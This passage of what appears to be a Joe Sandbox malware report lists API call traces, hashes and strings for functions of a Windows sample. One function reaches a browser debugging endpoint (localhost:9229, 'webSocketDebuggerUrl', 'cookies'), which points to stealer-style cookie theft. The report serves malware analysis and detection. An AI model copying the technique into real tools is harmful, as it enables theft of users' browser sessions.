                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                        • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                        • API String ID: 1201316467-3542011879
                        • Opcode ID: 9739e6fd20d074e5e44f3fe8de9ce140c22d42d2abb706362e17bfeb03c23bfe
                        • Instruction ID: f5839546f0c9baffcd7c25d27a60c25120bd8ae66387b8c8b7c70fe0c42c8bde
                        • Opcode Fuzzy Hash: 9739e6fd20d074e5e44f3fe8de9ce140c22d42d2abb706362e17bfeb03c23bfe
                        • Instruction Fuzzy Hash: 67E12671E10219DFDF14DFA8D984ADEBBB5BF88300F1044A9E509A7291DB74AE49CF90
                        Function 0091D980 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                        Download Yara Rule
                        APIs
                        • memset.MSVCRT ref: 0091D9A1
                        • memset.MSVCRT ref: 0091D9B3
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0091D9DB
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091DA0E
                        • lstrcat.KERNEL32(?,00000000), ref: 0091DA1C
                        • lstrcat.KERNEL32(?,015EFFD0), ref: 0091DA36
                        • lstrcat.KERNEL32(?,?), ref: 0091DA4A
                        • lstrcat.KERNEL32(?,015EE290), ref: 0091DA5E
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091DA8E
                        • GetFileAttributesA.KERNEL32(00000000), ref: 0091DA95
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091DAFE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                        • String ID:
                        • API String ID: 2367105040-0
                        • Opcode ID: cbd76ee105f45eef41f1105e23e989528962deb20283cd9507729562f519b454
                        • Instruction ID: 2c1736f2fb5942f420e5669703475f768e4f2be68638fd76e8e2bd8c5d227ca3
                        • Opcode Fuzzy Hash: cbd76ee105f45eef41f1105e23e989528962deb20283cd9507729562f519b454
                        • Instruction Fuzzy Hash: 2AB19171A112199FDB10EFA4DC889EE77B9BF88300F144965F946E7290DB349E85CB90
                        Function 0090B309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090B330
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090B37E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090B3A9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090B3B1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090B3D9
                        • lstrlen.KERNEL32(00934C50), ref: 0090B450
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090B474
                        • lstrcat.KERNEL32(00000000,00934C50), ref: 0090B480
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090B4A9
                        • lstrlen.KERNEL32(00000000), ref: 0090B52D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090B557
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090B55F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090B587
                        • lstrlen.KERNEL32(00934AD4), ref: 0090B5FE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090B622
                        • lstrcat.KERNEL32(00000000,00934AD4), ref: 0090B62E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090B65E
                        • lstrlen.KERNEL32(?), ref: 0090B767
                        • lstrlen.KERNEL32(?), ref: 0090B776
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090B79E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat
                        • String ID:
                        • API String ID: 2500673778-0
                        • Opcode ID: d430154f015f0a91d7ca0780600bb7619b0da5d472019978304112340a5b2366
                        • Instruction ID: f8bbacc8e4444b9dcdf3f4b0566e96bdf169578605e1e14b14c888c24020d811
                        • Opcode Fuzzy Hash: d430154f015f0a91d7ca0780600bb7619b0da5d472019978304112340a5b2366
                        • Instruction Fuzzy Hash: AA024030A01605DFCB25DF69D989B6EB7F9AF44714F298069E409AB2E1DB71DC42CF80
                        Function 00923760 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 009271FE
                        • RegOpenKeyExA.ADVAPI32(?,015EB518,00000000,00020019,?), ref: 009237BD
                        • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 009237F7
                        • wsprintfA.USER32 ref: 00923822
                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00923840
                        • RegCloseKey.ADVAPI32(?), ref: 0092384E
                        • RegCloseKey.ADVAPI32(?), ref: 00923858
                        • RegQueryValueExA.ADVAPI32(?,015EFCE8,00000000,000F003F,?,?), ref: 009238A1
                        • lstrlen.KERNEL32(?), ref: 009238B6
                        • RegQueryValueExA.ADVAPI32(?,015EFEC8,00000000,000F003F,?,00000400), ref: 00923927
                        • RegCloseKey.ADVAPI32(?), ref: 00923972
                        • RegCloseKey.ADVAPI32(?), ref: 00923989
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                        • String ID: - $%s\%s$?
                        • API String ID: 13140697-3278919252
                        • Opcode ID: 41e4da6ef39a4597adad1e5daa5ff26a5c20cc3032e33f1142fa3f833a18793b
                        • Instruction ID: 1e740f179c95d5fe72b54f9676819796ffa90b5c2debebe2ad84e802848d6f61
                        • Opcode Fuzzy Hash: 41e4da6ef39a4597adad1e5daa5ff26a5c20cc3032e33f1142fa3f833a18793b
                        • Instruction Fuzzy Hash: 88918C72900218DFCB10DF94ED84AEEB7B9FB88310F248569E509BB255DB35AE45CF90
                        Function 009090C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                        Download Yara Rule
                        APIs
                        • InternetOpenA.WININET(0092CFEC,00000001,00000000,00000000,00000000), ref: 009090DF
                        • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 009090FC
                        • InternetCloseHandle.WININET(00000000), ref: 00909109
                        • InternetReadFile.WININET(?,?,?,00000000), ref: 00909166
                        • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00909197
                        • InternetCloseHandle.WININET(00000000), ref: 009091A2
                        • InternetCloseHandle.WININET(00000000), ref: 009091A9
                        • strlen.MSVCRT ref: 009091BA
                        • strlen.MSVCRT ref: 009091ED
                        • strlen.MSVCRT ref: 0090922E
                        • strlen.MSVCRT ref: 0090924C
                          • Part of subcall function 00908980: std::_Xinvalid_argument.LIBCPMT ref: 00908996
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                        • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                        • API String ID: 1530259920-2144369209
                        • Opcode ID: 74d4433d8ce7af22951d84df2db944e0bb7cd408cc3fd4a4621b6fb9dde92715
                        • Instruction ID: 6f07b794465852eb1b52a961b2387d43308ed89e1f1a29cc4a717b669c5d020b
                        • Opcode Fuzzy Hash: 74d4433d8ce7af22951d84df2db944e0bb7cd408cc3fd4a4621b6fb9dde92715
                        • Instruction Fuzzy Hash: F151B371740209ABD720DBA8EC45FDEF7F9DB88710F140569F505E3281DBB4EA448BA5
                        Function 00921660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 009216A1
                        • lstrcpy.KERNEL32(00000000,015DA7A8), ref: 009216CC
                        • lstrlen.KERNEL32(?), ref: 009216D9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009216F6
                        • lstrcat.KERNEL32(00000000,?), ref: 00921704
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0092172A
                        • lstrlen.KERNEL32(015EF1F8), ref: 0092173F
                        • lstrcpy.KERNEL32(00000000,?), ref: 00921762
                        • lstrcat.KERNEL32(00000000,015EF1F8), ref: 0092176A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00921792
                        • ShellExecuteEx.SHELL32(?), ref: 009217CD
                        • ExitProcess.KERNEL32 ref: 00921803
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                        • String ID: <
                        • API String ID: 3579039295-4251816714
                        • Opcode ID: e4fb390419a8c508c40af2ddf8ce9c6e510e930a535f820cd0c92d5271cebae6
                        • Instruction ID: 182ebcaaec5b7e75fdb3588f022e6a5e239480d117558f665521506f4524a7c3
                        • Opcode Fuzzy Hash: e4fb390419a8c508c40af2ddf8ce9c6e510e930a535f820cd0c92d5271cebae6
                        • Instruction Fuzzy Hash: AA516271A0162AAFDB11DFA4DD88A9EB7FDAF98300F244125F505E3295DF70AE05CB90
                        Function 0091EFB0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091EFE4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091F012
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0091F026
                        • lstrlen.KERNEL32(00000000), ref: 0091F035
                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 0091F053
                        • StrStrA.SHLWAPI(00000000,?), ref: 0091F081
                        • lstrlen.KERNEL32(?), ref: 0091F094
                        • lstrlen.KERNEL32(00000000), ref: 0091F0B2
                        • lstrcpy.KERNEL32(00000000,ERROR), ref: 0091F0FF
                        • lstrcpy.KERNEL32(00000000,ERROR), ref: 0091F13F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$AllocLocal
                        • String ID: ERROR
                        • API String ID: 1803462166-2861137601
                        • Opcode ID: aa1cc1e77232c57430b9be1cb4b66eb0a410061e263b8b74553c36662ea35a10
                        • Instruction ID: ede40f0b5603efcd31020540a84802d8d3ab71b14f7f4faba7f6f7836dec1c8b
                        • Opcode Fuzzy Hash: aa1cc1e77232c57430b9be1cb4b66eb0a410061e263b8b74553c36662ea35a10
                        • Instruction Fuzzy Hash: 28518C31B142099FCB21AF78DD59BAE77E8AF94300F154568F84ADB292DE30EC458B90
                        Function 0090A010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                        Download Yara Rule
                        APIs
                        • GetEnvironmentVariableA.KERNEL32(015E8BB8,00B39BD8,0000FFFF), ref: 0090A026
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090A053
                        • lstrlen.KERNEL32(00B39BD8), ref: 0090A060
                        • lstrcpy.KERNEL32(00000000,00B39BD8), ref: 0090A08A
                        • lstrlen.KERNEL32(00934C4C), ref: 0090A095
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090A0B2
                        • lstrcat.KERNEL32(00000000,00934C4C), ref: 0090A0BE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090A0E4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090A0EF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090A114
                        • SetEnvironmentVariableA.KERNEL32(015E8BB8,00000000), ref: 0090A12F
                        • LoadLibraryA.KERNEL32(015D5568), ref: 0090A143
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                        • String ID:
                        • API String ID: 2929475105-0
                        • Opcode ID: 9baefdb3f660e6ae7d2ca601f3e790ac4e54495ac493774c28637f70d4967225
                        • Instruction ID: a6e08adb3f36fd1c0a946b5e9beb09c9c2575b481afc4854ea018802dca36a10
                        • Opcode Fuzzy Hash: 9baefdb3f660e6ae7d2ca601f3e790ac4e54495ac493774c28637f70d4967225
                        • Instruction Fuzzy Hash: AF91A130A00B109FD7319FA8DC88A6A37B9EB94715F604528F5158B2E2EFB5DD40CBC2
                        Function 0091C840 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091C8A2
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091C8D1
                        • lstrlen.KERNEL32(00000000), ref: 0091C8FC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091C932
                        • StrCmpCA.SHLWAPI(00000000,00934C3C), ref: 0091C943
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
